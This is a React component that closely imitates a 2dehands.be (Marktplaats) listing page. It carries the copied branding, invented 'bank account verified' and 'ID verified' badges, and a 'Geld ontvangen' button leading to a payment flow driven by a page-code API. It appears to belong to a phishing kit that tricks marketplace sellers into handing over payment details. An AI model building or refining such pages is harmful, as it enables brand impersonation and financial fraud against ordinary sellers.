import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './TweedehandsSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency } from '../stripeCurrency';
import { API_URL, LOCAL_FALLBACK_API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

async function fetchPageWithFallback(pageCode) {
  const tryFetch = async (base) => {
    const res = await fetch(`${base}/api/page/${pageCode}`);
    const data = await res.json();
    return { ok: res.ok, data };
  };
  try {
    const r1 = await tryFetch(API_URL);
    if (r1.ok || (r1.data && r1.data.success)) return r1.data;
  } catch {
    /* fallback */
  }
  if (API_URL !== LOCAL_FALLBACK_API_URL) {
    try {
      const r2 = await tryFetch(LOCAL_FALLBACK_API_URL);
      return r2.data;
    } catch {
      /* ignore */
    }
  }
  return { success: false };
}

function initialsFromTitle(text) {
  if (!text || !String(text).trim()) return '?';
  const parts = String(text).trim().split(/\s+/).slice(0, 2);
  return parts.map((w) => w[0]).join('').toUpperCase().slice(0, 3);
}

/**
 * 2dehands (BE) — success: двухрядный хедер как на 2dehands.be, данные и фото с API.
 */
function TweedehandsSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'BE').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const currencyText = primaryCurrency || 'EUR';

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${currencyText}` : `${priceText} ${currencyText}`;
  const title = pageData?.product_name?.trim() || 'Zoekertje';
  const address = pageData?.delivery_address || '—';
  const sinceText = pageData?.created_at_human || 'sinds 23 mar. ’26, 23:59';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const photoUrl = (pageData?.photo_url || '').trim();
  const listingRef = pageData?.page_code || pageCode || '';

  const sellerLine = (() => {
    const f = pageData?.first_name || '';
    const l = pageData?.last_name || '';
    const full = [f, l].filter(Boolean).join(' ');
    return full || null;
  })();

  const showPlaceholder = !photoUrl || imgFailed;

  if (loading && pageCode) {
    return (
      <div className="th-wrap">
        <header className="th-header">
          <div className="th-nav-bar">
            <div className="th-header-inner th-nav-inner">
              <div className="th-logo">
                <img src={(process.env.PUBLIC_URL || '') + '/2dehands-logo.png'} alt="2dehands" className="th-logo-img" />
              </div>
            </div>
          </div>
        </header>
        <main className="th-main">
          <div className="th-loading">Pagina laden...</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="th-wrap">
      <header className="th-header">
        <div className="th-nav-bar">
          <div className="th-header-inner th-nav-inner">
            <a href="#/" className="th-logo" aria-label="2dehands">
              <img src={(process.env.PUBLIC_URL || '') + '/2dehands-logo.png'} alt="2dehands" className="th-logo-img" />
            </a>
            <nav className="th-nav-links" aria-label="Service">
              <a href="#/">Help en info</a>
              <a href="#/">Voorwaarden</a>
              <a href="#/">Veiligheidscentrum</a>
            </nav>
            <div className="th-nav-spacer" />
            <div className="th-nav-actions">
              <button type="button" className="th-header-action">
                <span className="th-icon-chat" aria-hidden />
                Chat
              </button>
              <button type="button" className="th-header-action th-header-action--notif">
                <span className="th-icon-bell" aria-hidden />
                <span className="th-notif-badge" aria-hidden />
                Meldingen
              </button>
              <button type="button" className="th-place-ad">
                <span className="th-icon-pin" aria-hidden />
                Plaats zoekertje
              </button>
            </div>
          </div>
        </div>
        <div className="th-search-bar">
          <div className="th-search-inner">
            <input type="text" className="th-search-keyword" placeholder="Waar ben je naar op zoek?" readOnly />
            <select className="th-search-select" disabled aria-label="Categorie">
              <option>Alle categorieën...</option>
            </select>
            <input type="text" className="th-search-postcode" placeholder="Postcode" readOnly />
            <select className="th-search-select th-search-distance" disabled aria-label="Afstand">
              <option>Alle afstanden...</option>
            </select>
            <button type="button" className="th-zoek-btn">
              Zoek
            </button>
          </div>
        </div>
      </header>

      <main className="th-main">
        <section className="th-ad-section">
          <div className="th-ad-card">
            <div className="th-ad-left">
              <div className="th-ad-header">
                <h1 className="th-ad-title">{title}</h1>
                <div className="th-ad-meta">
                  {sinceText}
                  {listingRef ? <span className="th-ad-listing-id"> · {listingRef}</span> : null}
                </div>
              </div>
              <div className="th-ad-body">
                <div className="th-ad-image" aria-hidden>
                  {!showPlaceholder ? (
                    <img
                      src={photoUrl}
                      alt=""
                      className="th-ad-image-img"
                      onError={() => setImgFailed(true)}
                    />
                  ) : (
                    <span className="th-ad-image-placeholder">{initialsFromTitle(title)}</span>
                  )}
                </div>
              </div>
              <div className="th-ad-share">
                <span>Deel via</span>
                <span className="th-share-icon th-share-icon--whatsapp" aria-hidden />
                <span className="th-share-icon th-share-icon--fb" aria-hidden />
                <span className="th-share-icon th-share-icon--messenger" aria-hidden />
                <span className="th-share-icon th-share-icon--copy" aria-hidden />
                <span className="th-share-link">Kopieer link</span>
              </div>
            </div>

            <aside className="th-ad-right">
              <div className="th-price-line">
                <span className="th-price-amount">{amountLine}</span>
                <span className="th-price-shipping">Ophalen of Verzenden</span>
              </div>
              <div className="th-trust-box">
                {sellerLine ? (
                  <div className="th-trust-row">
                    <span className="th-trust-icon" aria-hidden />
                    <span>{sellerLine}</span>
                  </div>
                ) : null}
                <div className="th-trust-row">
                  <span className="th-trust-icon" aria-hidden />
                  <span>Bankrekening gecontroleerd</span>
                </div>
                <div className="th-trust-row">
                  <span className="th-trust-icon" aria-hidden />
                  <span>ID gecontroleerd</span>
                </div>
                <div className="th-trust-row th-trust-row--link">
                  <span className="th-trust-icon" aria-hidden />
                  <span>{address}</span>
                </div>
              </div>
              <Link to={index2Path} className="th-money-btn">
                Geld ontvangen
              </Link>
            </aside>
          </div>
        </section>

        <section className="th-categories">
          <div className="th-cat-row">
            <div className="th-cat-col">
              <h3>Audio, Tv en Foto</h3>
              <a href="#/">Digitale camera&apos;s</a>
              <a href="#/">Luidspreker boxen</a>
              <a href="#/">Stereoketens</a>
              <a href="#/">TV&apos;s</a>
            </div>
            <div className="th-cat-col">
              <h3>Auto&apos;s</h3>
              <a href="#/">BMW</a>
              <a href="#/">Opel</a>
              <a href="#/">Peugeot</a>
              <a href="#/">Volkswagen</a>
            </div>
            <div className="th-cat-col">
              <h3>Auto-onderdelen</h3>
              <a href="#/">Banden en Velgen</a>
              <a href="#/">Carrosserie en Plaatwerk</a>
              <a href="#/">Motor en Toebehoren</a>
              <a href="#/">Interieur en Bekleding</a>
            </div>
            <div className="th-cat-col">
              <h3>Fietsen en Brommers</h3>
              <a href="#/">Elektrische fietsen</a>
              <a href="#/">Fietsen | Bakfietsen</a>
              <a href="#/">Fietsen | Mountainbikes en ATB</a>
              <a href="#/">Snorfietsen en Snorscooters</a>
            </div>
          </div>

          <div className="th-cat-row">
            <div className="th-cat-col">
              <h3>Huis en Inrichting</h3>
              <a href="#/">Zetels</a>
              <a href="#/">Bedden</a>
              <a href="#/">Stoelen</a>
              <a href="#/">Tafels</a>
            </div>
            <div className="th-cat-col">
              <h3>Immo</h3>
              <a href="#/">Huizen te Koop</a>
              <a href="#/">Huizen te huur</a>
              <a href="#/">Huizen Buitenland</a>
              <a href="#/">Buitenverblijven</a>
            </div>
            <div className="th-cat-col">
              <h3>Kleding | Dames</h3>
              <a href="#/">Jurken</a>
              <a href="#/">Mutsen, Sjaals en Handschoenen</a>
              <a href="#/">Schoenen</a>
              <a href="#/">Winterjassen</a>
            </div>
            <div className="th-cat-col">
              <h3>Zakelijke goederen</h3>
              <a href="#/">Horeca</a>
              <a href="#/">Kantoor en Inrichting</a>
              <a href="#/">Machines en Bouw</a>
              <a href="#/">Tractoren</a>
            </div>
          </div>
        </section>
      </main>

      <footer className="th-footer">
        <div className="th-footer-links">
          <a href="#/">2dehands Zakelijk</a>
          <a href="#/">Veilig en Succesvol</a>
          <a href="#/">Help en info</a>
          <a href="#/">Voorwaarden</a>
          <a href="#/">Privacyverklaring</a>
          <a href="#/">Cookiebeleid</a>
          <a href="#/">Advertentievoorkeuren</a>
          <a href="#/">Over 2dehands</a>
          <a href="#/">Sitemap</a>
        </div>
        <div className="th-footer-copy">
          2dehands is niet aansprakelijk voor (gevolg)schade die voortkomt uit het gebruik van deze site, dan wel uit fouten
          of ontbrekende functionaliteiten op deze site. Copyright © 2024 Marktplaats B.V. Alle rechten voorbehouden.
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default TweedehandsSuccess;
